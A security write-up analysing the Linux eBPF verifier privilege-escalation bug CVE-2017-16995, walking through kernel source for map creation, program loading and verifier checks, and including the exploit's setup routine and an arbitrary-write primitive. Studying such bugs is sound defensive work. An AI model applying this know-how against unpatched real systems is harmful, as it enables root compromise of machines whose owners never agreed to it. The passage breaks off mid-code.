Analysis of a Privilege-Escalation Bug Caused by Integer Extension in the Linux ebpf Module (CVE-2017-16995)

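Jann Horn of Google Project Zero found and fixed this vulnerability at the end of 2017. In April 2018 the security researcher Vitaly Nikolenko rediscovered it and used it to escalate privileges on Ubuntu 16.04 running specific kernel versions. The exploit uses no stack corruption and no control-flow hijacking. It escalates privileges purely by manipulating data passed through system calls, which makes it a textbook data-oriented attack against the Linux kernel.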

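This analysis is based on kernel v4.4.110. You can download and build the source from here, or read it online here. The code, images and other files used in this article can be downloaded here.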

EBPF module analysis

I had read some BPF code before, while solving the seccomp-tools challenge on pwnable.tw. That reading was mainly aimed at reversing the rules of a seccomp sandbox.

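BPF stands for Berkeley Packet Filter, an architecture for filtering network packets. Common packet-capture tools on Linux, such as tcpdump and wireshark, rely on this module to provide packet capture to users. Starting with Linux 3.15, the kernel redesigned BPF on top of the original module and named the result extended BPF, or EBPF.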

EBPF's main job is to let users load packet-filtering code into the kernel. That code is then triggered whenever a packet arrives.

A typical packet-filter program is written as follows:

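  1. Call syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr)) to create a map. A map is a key/value store that both user space and the kernel can access.
     - Inside the kernel, the EBPF program reads it through the helper BPF_FUNC_map_lookup_elem.
     - User space reads it with syscall(__NR_bpf, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr)) and updates it with syscall(__NR_bpf, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr)).
     - Following the Linux convention, the map is treated as a file and is given a file descriptor.
  2. Call syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr)) to load the user's EBPF code into the kernel. The kernel checks the code's validity at this point by simulating its execution.
  3. Call setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) to attach the code from step 2 to a specific socket. From then on the EBPF code runs on every packet on that socket, and this time the execution is real.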
static void prep(void) {
    mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), sizeof(long long), 3);
    if (mapfd < 0)
        __exit(strerror(errno));
    puts("mapfd finished");
    progfd = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER,
                           (struct bpf_insn *)__prog, PROGSIZE, "GPL", 0);

    if (progfd < 0)
        __exit(strerror(errno));
    puts("bpf_prog_load finished");
    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets))
        __exit(strerror(errno));
    puts("socketpair finished");
    if (setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0)
        __exit(strerror(errno));
    puts("setsockopt finished");
}

Introduction to the EBPF instruction set

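EBPF does not use the kernel's native assembly instructions. It has its own instruction set built on the bpf_insn structure. It also maintains 11 registers (R0-R10), a stack, and map structures for exchanging data with user space.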

First, the registers:

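R0: usually holds function return values, including the return value of the whole BPF program (which can itself be viewed as a function);
R1~R5: usually hold the arguments to the kernel's predefined helper functions;
R6~R9: general storage inside BPF code; helper calls do not change their values;
R10: read-only, used as the stack (frame) pointer.
They can be thought of as the following physical registers, which is the mapping used by the x86-64 JIT:
R0 - rax
R1 - rdi
R2 - rsi
R3 - rdx
R4 - rcx
R5 - r8
R6 - rbx
R7 - r13
R8 - r14
R9 - r15
R10 - rbp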

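In the interpreter, however, the registers are not mapped directly onto CPU registers. Like the stack that EBPF emulates, they are just temporary variables on the kernel stack. This is analyzed at the code level later.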

Next, the instructions:

struct bpf_insn {
    __u8  code;       /* opcode */
    __u8  dst_reg:4;  /* dest register */
    __u8  src_reg:4;  /* source register */
    __s16 off;        /* signed offset */
    __s32 imm;        /* signed immediate constant */
};

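Readers familiar with seccomp-tools may notice that this structure is similar to the one seccomp uses. An instruction's function is determined mainly by the code byte. code is 8 bits wide, and its lowest 3 bits select the instruction class. The definitions below list 8 class values (0-7). They come from classic BPF: in EBPF, 0x07 (BPF_MISC) is reused as BPF_ALU64, and 0x06 (BPF_RET) is unused.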

#define BPF_CLASS(code) ((code) & 0x07)
#define BPF_LD    0x00
#define BPF_LDX   0x01
#define BPF_ST    0x02
#define BPF_STX   0x03
#define BPF_ALU   0x04
#define BPF_JMP   0x05
#define BPF_RET   0x06
#define BPF_MISC  0x07

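Within each class, further operations are formed by OR-ing (not XOR-ing) additional bit fields into code. These fields select the operation, the source operand, the access size and the addressing mode. The macro names in the implementation show roughly what each operation does. I put a small encoder/decoder tool at the GitHub link; it can translate EBPF programs or help you write them.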
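The sketch below shows one way to pull apart the fields of code. It assumes the v4.4-era bit layout from linux/bpf_common.h and linux/bpf.h, where ALU/JMP classes split the upper bits into source and operation, and load/store classes split them into size and mode. decode_opcode and struct opcode_fields are hypothetical names for illustration, not the author's tool:

```c
#include <stdint.h>

/* Field masks, assumed to mirror linux/bpf_common.h and linux/bpf.h. */
#define CLASS_MASK 0x07  /* bits 0-2: instruction class                    */
#define SRC_MASK   0x08  /* bit 3 (ALU/JMP): BPF_K = 0x00, BPF_X = 0x08     */
#define OP_MASK    0xf0  /* bits 4-7 (ALU/JMP): operation, e.g. MOV = 0xb0  */
#define SIZE_MASK  0x18  /* bits 3-4 (LD/ST): W=0x00 H=0x08 B=0x10 DW=0x18  */
#define MODE_MASK  0xe0  /* bits 5-7 (LD/ST): IMM=0x00 MEM=0x60 XADD=0xc0   */

struct opcode_fields {
    uint8_t cls;
    uint8_t src;   /* only meaningful for ALU / JMP / ALU64 */
    uint8_t op;    /* only meaningful for ALU / JMP / ALU64 */
    uint8_t size;  /* only meaningful for LD / LDX / ST / STX */
    uint8_t mode;  /* only meaningful for LD / LDX / ST / STX */
};

static struct opcode_fields decode_opcode(uint8_t code)
{
    struct opcode_fields f = {0};

    f.cls = code & CLASS_MASK;
    if (f.cls >= 0x04) {        /* ALU (4), JMP (5), ALU64 (7); 6 is unused in 4.4 eBPF */
        f.src = code & SRC_MASK;
        f.op  = code & OP_MASK;
    } else {                    /* LD (0), LDX (1), ST (2), STX (3) */
        f.size = code & SIZE_MASK;
        f.mode = code & MODE_MASK;
    }
    return f;
}
```

For example, 0xb4 (the first byte of the exploit program) decodes to class BPF_ALU, operation BPF_MOV and source BPF_K, which is a 32-bit "move immediate".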

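dst_reg is the destination register and src_reg is the source register; both are limited to 0~10. off is a signed offset used by memory accesses and jumps. imm is an immediate value.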
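The sketch below serialises one instruction into 8 bytes, to connect struct bpf_insn with the raw bytes of the exploit's __prog string. It assumes a little-endian x86-64 build on which the compiler places dst_reg in the low nibble of the second byte, which matches the exploit bytes. encode_insn is a hypothetical helper:

```c
#include <stdint.h>
#include <string.h>

/* Serialise one eBPF instruction into the 8-byte layout of struct bpf_insn,
 * assuming little-endian byte order and dst_reg in the low nibble of byte 1. */
static void encode_insn(uint8_t out[8], uint8_t code, uint8_t dst,
                        uint8_t src, int16_t off, int32_t imm)
{
    uint16_t uoff = (uint16_t)off;
    uint32_t uimm = (uint32_t)imm;

    out[0] = code;
    out[1] = (uint8_t)(((src & 0x0f) << 4) | (dst & 0x0f));
    out[2] = (uint8_t)(uoff & 0xff);          /* off, little-endian */
    out[3] = (uint8_t)(uoff >> 8);
    for (int i = 0; i < 4; i++)               /* imm, little-endian */
        out[4 + i] = (uint8_t)(uimm >> (8 * i));
}
```

For instance, encode_insn(buf, 0xb4, 9, 0, 0, -1) reproduces the first 8 bytes of __prog, \xb4\x09\x00\x00\xff\xff\xff\xff.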

Next, we walk through how EBPF runs, at the code level.

BPF_MAP_CREATE

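This command first calls map_create. This is the same function that contained the bpf integer-overflow bug analyzed in my previous blog post; see that post for details. In essence, map_create does three things:
- It allocates memory whose size is the map management structure plus the storage requested through attr (key/value sizes and number of entries).
- It assigns the map a file descriptor.
- It installs the map so that later calls can look it up by fd number.
This part is largely unrelated to the present bug.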

map_create

/* called via syscall */
static int map_create(union bpf_attr *attr)
{
struct bpf_map *map;
int err;

err = CHECK_ATTR(BPF_MAP_CREATE);
if (err)
return -EINVAL;

/* find map type and init map: hashtable vs rbtree vs bloom vs ... */
map = find_and_alloc_map(attr);
if (IS_ERR(map))
return PTR_ERR(map);

atomic_set(&map->refcnt, 1);
atomic_set(&map->usercnt, 1);

err = bpf_map_charge_memlock(map);
if (err)
goto free_map;

err = bpf_map_new_fd(map);
if (err < 0)
/* failed to allocate fd */
goto free_map;

return err;

free_map:
map->ops->map_free(map);
return err;
}

BPF_PROG_LOAD

This command loads the user's EBPF program into the kernel and performs several checks along the way.

bpf_prog_load

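Execution first enters bpf_prog_load, which proceeds as follows:
- [1] checks whether the program's license is GPL-compatible. A non-GPL program can still be loaded, but it cannot call GPL-only helpers.
- [2] checks that the instruction count is below BPF_MAXINSNS (4096).
- [3] allocates a bpf_prog structure with bpf_prog_alloc, with room for the program's instructions.
- [4] copies the user-space EBPF program into that memory.
- [5] looks up the program type. socket_filter means packet filtering. tracing_filter means tracing (kprobe) programs; it is not seccomp, which uses classic BPF and does not go through this path. Note also the capability check just before [3]: only BPF_PROG_TYPE_SOCKET_FILTER programs can be loaded without CAP_SYS_ADMIN.
- [6] calls bpf_check to verify the user's program.
If verification passes, bpf_prog_select_runtime sets the program's execution function to __bpf_prog_run, the interpreter that really runs it. It then tries to JIT-compile the program. If JIT is unavailable or fails, the program keeps running on the interpreter.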

static int bpf_prog_load(union bpf_attr *attr)
{
enum bpf_prog_type type = attr->prog_type;
struct bpf_prog *prog;
int err;
char license[128];
bool is_gpl;

if (CHECK_ATTR(BPF_PROG_LOAD))
return -EINVAL;

/* copy eBPF program license from user space */
if (strncpy_from_user(license, u64_to_ptr(attr->license),
sizeof(license) - 1) < 0)
return -EFAULT;
license[sizeof(license) - 1] = 0;

/* eBPF programs must be GPL compatible to use GPL-ed functions */
[1] is_gpl = license_is_gpl_compatible(license);

[2] if (attr->insn_cnt >= BPF_MAXINSNS) //4096
return -EINVAL;

if (type == BPF_PROG_TYPE_KPROBE &&
attr->kern_version != LINUX_VERSION_CODE)
return -EINVAL;

if (type != BPF_PROG_TYPE_SOCKET_FILTER && !capable(CAP_SYS_ADMIN))
return -EPERM;

/* plain bpf_prog allocation */
[3] prog = bpf_prog_alloc(bpf_prog_size(attr->insn_cnt), GFP_USER);
if (!prog)
return -ENOMEM;

err = bpf_prog_charge_memlock(prog);
if (err)
goto free_prog_nouncharge;

prog->len = attr->insn_cnt;

err = -EFAULT;
[4] if (copy_from_user(prog->insns, u64_to_ptr(attr->insns),
prog->len * sizeof(struct bpf_insn)) != 0)
goto free_prog;

prog->orig_prog = NULL;
prog->jited = 0;

atomic_set(&prog->aux->refcnt, 1);
prog->gpl_compatible = is_gpl ? 1 : 0;

/* find program type: socket_filter vs tracing_filter */
[5] err = find_prog_type(type, prog);
if (err < 0)
goto free_prog;

/* run eBPF verifier */
[6] err = bpf_check(&prog, attr); // here
if (err < 0)
goto free_used_maps;

/* fixup BPF_CALL->imm field */
fixup_bpf_calls(prog);

/* eBPF program is ready to be JITed */
err = bpf_prog_select_runtime(prog);
if (err < 0)
goto free_used_maps;

err = bpf_prog_new_fd(prog);
if (err < 0)
/* failed to allocate fd */
goto free_used_maps;

return err;

free_used_maps:
free_used_maps(prog->aux);
free_prog:
bpf_prog_uncharge_memlock(prog);
free_prog_nouncharge:
bpf_prog_free(prog);
return err;
}
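The early checks [1] and [2] can be mirrored in user space, as in the sketch below. This is not kernel code. precheck_prog and license_gpl_compatible are hypothetical names. The license list is, to my knowledge, the one in include/linux/license.h in the 4.4 era. A non-GPL license does not make loading fail; it only records gpl_compatible = 0:

```c
#include <stdbool.h>
#include <string.h>

#define SKETCH_BPF_MAXINSNS 4096  /* BPF_MAXINSNS in v4.4 */

/* Strings accepted by license_is_gpl_compatible() (assumed v4.4 list). */
static bool license_gpl_compatible(const char *license)
{
    static const char *const ok[] = {
        "GPL", "GPL v2", "GPL and additional rights",
        "Dual BSD/GPL", "Dual MIT/GPL", "Dual MPL/GPL",
    };
    for (size_t i = 0; i < sizeof(ok) / sizeof(ok[0]); i++)
        if (strcmp(license, ok[i]) == 0)
            return true;
    return false;
}

/* Mirrors checks [1]/[2] of bpf_prog_load(); returns 0 if the program would
 * get past them. The license result is only recorded, never fatal here. */
static int precheck_prog(unsigned insn_cnt, const char *license, bool *is_gpl)
{
    *is_gpl = license_gpl_compatible(license);
    if (insn_cnt >= SKETCH_BPF_MAXINSNS)
        return -1;  /* the kernel returns -EINVAL */
    return 0;
}
```

The exploit program has 41 instructions (PROGSIZE 328 / 8) and uses "GPL", so it passes both checks trivially.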

bpf_check

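Next comes the verification logic, bpf_check, which runs in three stages:
- [1] replaces the map fd in certain instructions with the actual address of the corresponding map. The map address is an 8-byte kernel address, so it takes two instructions' worth of space to store; see the analysis of that function below.
- [2], check_cfg, borrows the idea of a control-flow graph. It checks the EBPF program for loops, out-of-range jumps and unreachable instructions, any of which could cause unpredictable behavior.
- [3], do_check, simulates execution along every path and rejects the program if any problem is found. It is the heart of the verifier.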

int bpf_check(struct bpf_prog **prog, union bpf_attr *attr)
{
char __user *log_ubuf = NULL;
struct verifier_env *env;
int ret = -EINVAL;

if ((*prog)->len <= 0 || (*prog)->len > BPF_MAXINSNS)
return -E2BIG;

/* 'struct verifier_env' can be global, but since it's not small,
* allocate/free it every time bpf_check() is called
*/
env = kzalloc(sizeof(struct verifier_env), GFP_KERNEL);
if (!env)
return -ENOMEM;

env->prog = *prog;

/* grab the mutex to protect few globals used by verifier */
mutex_lock(&bpf_verifier_lock);

if (attr->log_level || attr->log_buf || attr->log_size) {
/* user requested verbose verifier output
* and supplied buffer to store the verification trace
*/
log_level = attr->log_level;
log_ubuf = (char __user *) (unsigned long) attr->log_buf;
log_size = attr->log_size;
log_len = 0;

ret = -EINVAL;
/* log_* values have to be sane */
if (log_size < 128 || log_size > UINT_MAX >> 8 ||
log_level == 0 || log_ubuf == NULL)
goto free_env;

ret = -ENOMEM;
log_buf = vmalloc(log_size);
if (!log_buf)
goto free_env;
} else {
log_level = 0;
}

[1] ret = replace_map_fd_with_map_ptr(env); // replace the map fd in each BPF_LD_IMM64 imm with the map pointer
if (ret < 0)
goto skip_full_check;

env->explored_states = kcalloc(env->prog->len,
sizeof(struct verifier_state_list *),
GFP_USER);
ret = -ENOMEM;
if (!env->explored_states)
goto skip_full_check;

[2] ret = check_cfg(env); // CFG check: reject loops, out-of-range jumps and unreachable insns
if (ret < 0)
goto skip_full_check;

env->allow_ptr_leaks = capable(CAP_SYS_ADMIN);

[3] ret = do_check(env);

skip_full_check:
while (pop_stack(env, NULL) >= 0);
free_states(env);

if (ret == 0)
/* program is valid, convert *(u32*)(ctx + off) accesses */
ret = convert_ctx_accesses(env);

if (log_level && log_len >= log_size - 1) {
BUG_ON(log_len >= log_size);
/* verifier log exceeded user supplied buffer */
ret = -ENOSPC;
/* fall through to return what was recorded */
}

/* copy verifier log back to user space including trailing zero */
if (log_level && copy_to_user(log_ubuf, log_buf, log_len + 1) != 0) {
ret = -EFAULT;
goto free_log_buf;
}

if (ret == 0 && env->used_map_cnt) {
/* if program passed verifier, update used_maps in bpf_prog_info */
env->prog->aux->used_maps = kmalloc_array(env->used_map_cnt,
sizeof(env->used_maps[0]),
GFP_KERNEL);

if (!env->prog->aux->used_maps) {
ret = -ENOMEM;
goto free_log_buf;
}

memcpy(env->prog->aux->used_maps, env->used_maps,
sizeof(env->used_maps[0]) * env->used_map_cnt);
env->prog->aux->used_map_cnt = env->used_map_cnt;

/* program is valid. Convert pseudo bpf_ld_imm64 into generic
* bpf_ld_imm64 instructions
*/
convert_pseudo_ld_imm64(env);
}

free_log_buf:
if (log_level)
vfree(log_buf);
free_env:
if (!env->prog->aux->used_maps)
/* if we didn't copy map pointers into bpf_prog_info, release
* them now. Otherwise free_bpf_prog_info() will release them.
*/
release_maps(env);
*prog = env->prog;
kfree(env);
mutex_unlock(&bpf_verifier_lock);
return ret;
}
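The idea behind check_cfg [2] can be sketched as a depth-first search with three colours:
- An edge back to an instruction that is still on the DFS path means a loop.
- A successor outside the program means an out-of-range jump.
- An instruction that is never visited is unreachable.

This toy version is recursive and ignores the two-slot BPF_LD_IMM64 instruction, whereas the kernel uses an explicit stack. struct toy_insn and toy_check_cfg are hypothetical:

```c
#include <stdbool.h>

/* Toy instruction: only what control flow needs. */
struct toy_insn {
    bool is_exit;   /* BPF_EXIT: no successors                     */
    bool is_ja;     /* BPF_JA: unconditional jump, no fall-through */
    bool is_cond;   /* conditional jump: fall-through + target     */
    int  off;       /* jump target = idx + off + 1                 */
};

enum { WHITE, GREY, BLACK };
enum { CFG_OK = 0, CFG_LOOP = -1, CFG_OUT_OF_RANGE = -2, CFG_UNREACHABLE = -3 };

static int dfs(const struct toy_insn *p, int n, int idx, int *color)
{
    int succ[2], nsucc = 0;

    if (idx < 0 || idx >= n)
        return CFG_OUT_OF_RANGE;   /* jump or fall-through leaves the program */
    if (color[idx] == GREY)
        return CFG_LOOP;           /* back-edge: idx is still on the DFS path */
    if (color[idx] == BLACK)
        return CFG_OK;             /* already fully explored                  */

    color[idx] = GREY;
    if (!p[idx].is_exit) {
        if (!p[idx].is_ja)
            succ[nsucc++] = idx + 1;               /* fall-through */
        if (p[idx].is_ja || p[idx].is_cond)
            succ[nsucc++] = idx + p[idx].off + 1;  /* jump target  */
    }
    for (int i = 0; i < nsucc; i++) {
        int err = dfs(p, n, succ[i], color);
        if (err)
            return err;
    }
    color[idx] = BLACK;
    return CFG_OK;
}

/* CFG_OK only for a loop-free program whose instructions are all reachable
 * (at most 64 instructions in this sketch). */
static int toy_check_cfg(const struct toy_insn *p, int n)
{
    int color[64] = {0};

    if (n <= 0 || n > 64)
        return CFG_OUT_OF_RANGE;
    int err = dfs(p, n, 0, color);
    if (err)
        return err;
    for (int i = 0; i < n; i++)
        if (color[i] != BLACK)
            return CFG_UNREACHABLE;
    return CFG_OK;
}
```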

replace_map_fd_with_map_ptr

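replace_map_fd_with_map_ptr acts when both conditions [1] and [2] hold: opcode == BPF_LD | BPF_IMM | BPF_DW = 0x18, and src_reg == BPF_PSEUDO_MAP_FD = 1. In that case it does the following:
1. It looks up the map using the fd in imm.
2. It splits the resulting address into two halves.
3. It stores the halves in the imm fields of this instruction and the next one, which matches the two-instruction footprint mentioned above.

An instruction that meets both conditions is also known as BPF_LD_MAP_FD, which loads a map address into a register. The second slot is not free padding. All of its fields except imm must be zero, and its imm receives the upper 32 bits of the address.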

static int replace_map_fd_with_map_ptr(struct verifier_env *env)
{
struct bpf_insn *insn = env->prog->insnsi;
int insn_cnt = env->prog->len;
int i, j;

for (i = 0; i < insn_cnt; i++, insn++) {
if (BPF_CLASS(insn->code) == BPF_LDX &&
(BPF_MODE(insn->code) != BPF_MEM || insn->imm != 0)) {
verbose("BPF_LDX uses reserved fields\n");
return -EINVAL;
} // BPF_LDX: only BPF_MEM mode is allowed; the reserved imm must be 0

if (BPF_CLASS(insn->code) == BPF_STX &&
((BPF_MODE(insn->code) != BPF_MEM &&
BPF_MODE(insn->code) != BPF_XADD) || insn->imm != 0)) {
verbose("BPF_STX uses reserved fields\n");
return -EINVAL;
} // BPF_STX: only BPF_MEM or BPF_XADD mode is allowed; the reserved imm must be 0

[1] if (insn[0].code == (BPF_LD | BPF_IMM | BPF_DW)) {
struct bpf_map *map;
struct fd f;

if (i == insn_cnt - 1 || insn[1].code != 0 ||
insn[1].dst_reg != 0 || insn[1].src_reg != 0 ||
insn[1].off != 0) {
verbose("invalid bpf_ld_imm64 insn\n");
return -EINVAL;
} // ld_imm64 cannot be the last insn; its second slot must be all zero except imm

if (insn->src_reg == 0)
/* valid generic load 64-bit imm */
goto next_insn;

[2] if (insn->src_reg != BPF_PSEUDO_MAP_FD) {
verbose("unrecognized bpf_ld_imm64 insn\n");
return -EINVAL;
}

f = fdget(insn->imm);
map = __bpf_map_get(f);
if (IS_ERR(map)) {
verbose("fd %d is not pointing to valid bpf_map\n",
insn->imm);
return PTR_ERR(map);
}

/* store map pointer inside BPF_LD_IMM64 instruction */
insn[0].imm = (u32) (unsigned long) map;
insn[1].imm = ((u64) (unsigned long) map) >> 32;

/* check whether we recorded this map already */
for (j = 0; j < env->used_map_cnt; j++)
if (env->used_maps[j] == map) {
fdput(f);
goto next_insn;
}

if (env->used_map_cnt >= MAX_USED_MAPS) {
fdput(f);
return -E2BIG;
}

/* hold the map. If the program is rejected by verifier,
* the map will be released by release_maps() or it
* will be used by the valid program until it's unloaded
* and all maps are released in free_bpf_prog_info()
*/
map = bpf_map_inc(map, false);
if (IS_ERR(map)) {
fdput(f);
return PTR_ERR(map);
}
env->used_maps[env->used_map_cnt++] = map;

fdput(f);
next_insn:
insn++;
i++;
}
}

/* now all pseudo BPF_LD_IMM64 instructions load valid
* 'struct bpf_map *' into a register instead of user map_fd.
* These pointers will be used later by verifier to validate map access.
*/
return 0;
}
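The sketch below covers both directions: the split performed above, and the reassembly done by the interpreter's LD_IMM_DW handler (DST = (u64)(u32)insn[0].imm | ((u64)(u32)insn[1].imm) << 32). The function names are hypothetical:

```c
#include <stdint.h>

/* What replace_map_fd_with_map_ptr() stores into the two imm fields. */
static void split_imm64(uint64_t ptr, int32_t *imm_lo, int32_t *imm_hi)
{
    *imm_lo = (int32_t)(uint32_t)ptr;          /* insn[0].imm = (u32) map       */
    *imm_hi = (int32_t)(uint32_t)(ptr >> 32);  /* insn[1].imm = (u64) map >> 32 */
}

/* How the interpreter rebuilds the 64-bit value at run time. */
static uint64_t merge_imm64(int32_t imm_lo, int32_t imm_hi)
{
    /* Going through uint32_t first keeps imm_lo from being sign-extended
     * into the upper half. */
    return (uint64_t)(uint32_t)imm_lo | ((uint64_t)(uint32_t)imm_hi << 32);
}
```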

do_check

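Now we reach do_check, the core of the verification. The whole function runs inside an endless for loop and maintains a set of simulated registers, defined and initialized as shown below. Each register's value is stored as an int (32-bit signed) together with an enum type field. The types include not initialized, unknown value, constant immediate, and several kinds of pointer. At initialization every register is marked NOT_INIT with value 0. R10 is then marked FRAME_PTR (the stack pointer), and R1 is marked PTR_TO_CTX (a pointer to the context).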

struct reg_state {
enum bpf_reg_type type;
union {
/* valid when type == CONST_IMM | PTR_TO_STACK */
int imm;

/* valid when type == CONST_PTR_TO_MAP | PTR_TO_MAP_VALUE |
* PTR_TO_MAP_VALUE_OR_NULL
*/
struct bpf_map *map_ptr;
};
};

static void init_reg_state(struct reg_state *regs)
{
int i;

for (i = 0; i < MAX_BPF_REG; i++) {
regs[i].type = NOT_INIT;
regs[i].imm = 0;
regs[i].map_ptr = NULL;
}

/* frame pointer */
regs[BPF_REG_FP].type = FRAME_PTR;

/* 1st arg to a function */
regs[BPF_REG_1].type = PTR_TO_CTX;
}

/* types of values stored in eBPF registers */
enum bpf_reg_type {
NOT_INIT = 0, /* nothing was written into register */
UNKNOWN_VALUE, /* reg doesn't contain a valid pointer */
PTR_TO_CTX, /* reg points to bpf_context */
CONST_PTR_TO_MAP, /* reg points to struct bpf_map */
PTR_TO_MAP_VALUE, /* reg points to map element value */
PTR_TO_MAP_VALUE_OR_NULL,/* points to map elem value or NULL */
FRAME_PTR, /* reg == frame_pointer */
PTR_TO_STACK, /* reg == frame_pointer + imm */
CONST_IMM, /* constant integer value */
};

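do_check processes the program one instruction at a time and applies checks specific to each class. There are too many instructions to cover one by one, so below I show how the program is checked from two attack angles.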

Q&A1: How does the for loop finish checking and exit?

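The exit instruction is BPF_EXIT, which belongs to the BPF_JMP class. When the verifier reaches it, it calls pop_stack. If pop_stack returns a negative value, break leaves the endless loop. Otherwise the returned value is used as the index of the next instruction to check.

The logic works like backtracking in a maze-solving search. At a conditional jump the verifier follows one branch and pushes the other onto a stack. When one path finishes, it pops the saved branch and checks it.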

 else if (class == BPF_JMP) {
u8 opcode = BPF_OP(insn->code);

if (opcode == BPF_CALL) {
if (BPF_SRC(insn->code) != BPF_K ||
insn->off != 0 ||
insn->src_reg != BPF_REG_0 ||
insn->dst_reg != BPF_REG_0) {
verbose("BPF_CALL uses reserved fields\n");
return -EINVAL;
}

err = check_call(env, insn->imm);
if (err)
return err;

} else if (opcode == BPF_JA) {
if (BPF_SRC(insn->code) != BPF_K ||
insn->imm != 0 ||
insn->src_reg != BPF_REG_0 ||
insn->dst_reg != BPF_REG_0) {
verbose("BPF_JA uses reserved fields\n");
return -EINVAL;
}

insn_idx += insn->off + 1;
continue;

} else if (opcode == BPF_EXIT) {
if (BPF_SRC(insn->code) != BPF_K ||
insn->imm != 0 ||
insn->src_reg != BPF_REG_0 ||
insn->dst_reg != BPF_REG_0) {
verbose("BPF_EXIT uses reserved fields\n");
return -EINVAL;
}

/* eBPF calling convetion is such that R0 is used
* to return the value from eBPF program.
* Make sure that it's readable at this time
* of bpf_exit, which means that program wrote
* something into it earlier
*/
err = check_reg_arg(regs, BPF_REG_0, SRC_OP);
if (err)
return err;

if (is_pointer_value(env, BPF_REG_0)) {
verbose("R0 leaks addr as return value\n");
return -EACCES;
}

process_bpf_exit:
insn_idx = pop_stack(env, &prev_insn_idx);
if (insn_idx < 0) {
break;
} else {
do_print_state = true;
continue;
}
} else {
err = check_cond_jmp_op(env, insn, &insn_idx);
if (err)
return err;
}
}

Now look at pop_stack. It first checks whether env->head is NULL; if so, no unexplored paths remain. Otherwise it restores the saved verifier state.

static int pop_stack(struct verifier_env *env, int *prev_insn_idx)
{
    struct verifier_stack_elem *elem;
    int insn_idx;

    if (env->head == NULL)
        return -1;

    memcpy(&env->cur_state, &env->head->st, sizeof(env->cur_state));
    insn_idx = env->head->insn_idx;
    if (prev_insn_idx)
        *prev_insn_idx = env->head->prev_insn_idx;
    elem = env->head->next;
    kfree(env->head);
    env->head = elem;
    env->stack_size--;
    return insn_idx;
}

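Next, look at the conditional-branch handler check_cond_jmp_op. It splits jumps into two cases:
- Case [1] applies to JEQ/JNE against an immediate when the destination register is a known constant (CONST_IMM) equal to that immediate. The verifier then treats the outcome as decided and follows only one branch: the jump for JEQ, the fall-through for JNE. The other branch is never pushed and therefore never verified.
- Case [2] covers everything else. The target insn_idx + off + 1 is pushed onto the stack as the other branch to explore.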

static int check_cond_jmp_op(struct verifier_env *env,
struct bpf_insn *insn, int *insn_idx)
{
struct reg_state *regs = env->cur_state.regs;
struct verifier_state *other_branch;
u8 opcode = BPF_OP(insn->code);
int err;

if (opcode > BPF_EXIT) {
verbose("invalid BPF_JMP opcode %x\n", opcode);
return -EINVAL;
}

if (BPF_SRC(insn->code) == BPF_X) {
if (insn->imm != 0) {
verbose("BPF_JMP uses reserved fields\n");
return -EINVAL;
}

/* check src1 operand */
err = check_reg_arg(regs, insn->src_reg, SRC_OP);
if (err)
return err;

if (is_pointer_value(env, insn->src_reg)) {
verbose("R%d pointer comparison prohibited\n",
insn->src_reg);
return -EACCES;
}
} else {
if (insn->src_reg != BPF_REG_0) {
verbose("BPF_JMP uses reserved fields\n");
return -EINVAL;
}
}

/* check src2 operand */
err = check_reg_arg(regs, insn->dst_reg, SRC_OP);
if (err)
return err;

/* detect if R == 0 where R was initialized to zero earlier */
[1] if (BPF_SRC(insn->code) == BPF_K &&
(opcode == BPF_JEQ || opcode == BPF_JNE) &&
regs[insn->dst_reg].type == CONST_IMM &&
regs[insn->dst_reg].imm == insn->imm) {
if (opcode == BPF_JEQ) {
/* if (imm == imm) goto pc+off;
* only follow the goto, ignore fall-through
*/
*insn_idx += insn->off;
return 0;
} else {
/* if (imm != imm) goto pc+off;
* only follow fall-through branch, since
* that's where the program will go
*/
return 0;
}
}

[2] other_branch = push_stack(env, *insn_idx + insn->off + 1, *insn_idx);
if (!other_branch)
return -EFAULT;

/* detect if R == 0 where R is returned value from bpf_map_lookup_elem() */
if (BPF_SRC(insn->code) == BPF_K &&
insn->imm == 0 && (opcode == BPF_JEQ ||
opcode == BPF_JNE) &&
regs[insn->dst_reg].type == PTR_TO_MAP_VALUE_OR_NULL) {
if (opcode == BPF_JEQ) {
/* next fallthrough insn can access memory via
* this register
*/
regs[insn->dst_reg].type = PTR_TO_MAP_VALUE;
/* branch targer cannot access it, since reg == 0 */
other_branch->regs[insn->dst_reg].type = CONST_IMM;
other_branch->regs[insn->dst_reg].imm = 0;
} else {
other_branch->regs[insn->dst_reg].type = PTR_TO_MAP_VALUE;
regs[insn->dst_reg].type = CONST_IMM;
regs[insn->dst_reg].imm = 0;
}
} else if (is_pointer_value(env, insn->dst_reg)) {
verbose("R%d pointer comparison prohibited\n", insn->dst_reg);
return -EACCES;
} else if (BPF_SRC(insn->code) == BPF_K &&
(opcode == BPF_JEQ || opcode == BPF_JNE)) {

if (opcode == BPF_JEQ) {
/* detect if (R == imm) goto
* and in the target state recognize that R = imm
*/
other_branch->regs[insn->dst_reg].type = CONST_IMM;
other_branch->regs[insn->dst_reg].imm = insn->imm;
} else {
/* detect if (R != imm) goto
* and in the fall-through state recognize that R = imm
*/
regs[insn->dst_reg].type = CONST_IMM;
regs[insn->dst_reg].imm = insn->imm;
}
}
if (log_level)
print_verifier_state(env);
return 0;
}

Q&A2: Can memory be read and written directly?

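Memory reads and writes mainly use BPF_LDX_MEM and BPF_STX_MEM instructions. Take the instruction below as an example. If the values of r7 and r8 are controllable, it gives an arbitrary write, similar to mov qword ptr [r7], r8. The arguments follow my decoder tool's format: src, dst, off, imm.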

STX_MEM_DW(8,7,0x0,0x0)

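Next, the restrictions on loads and stores:
- check_reg_arg ([1]) checks that the register number does not exceed 10.
- For a source operand (SRC_OP), check_reg_arg rejects uninitialized registers.
- For a destination operand, check_reg_arg rejects writes to R10 (the frame pointer). With DST_OP it also marks the register as UNKNOWN_VALUE.
- check_mem_access ([2]) then checks the base register, dst for a store and src for a load. That register must hold a stack pointer, a context pointer or a map-value pointer; any other type cannot be read or written.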

 else if (class == BPF_LDX) {
enum bpf_reg_type src_reg_type;

/* check for reserved fields is already done */

/* check src operand */
[1] err = check_reg_arg(regs, insn->src_reg, SRC_OP);
if (err)
return err;

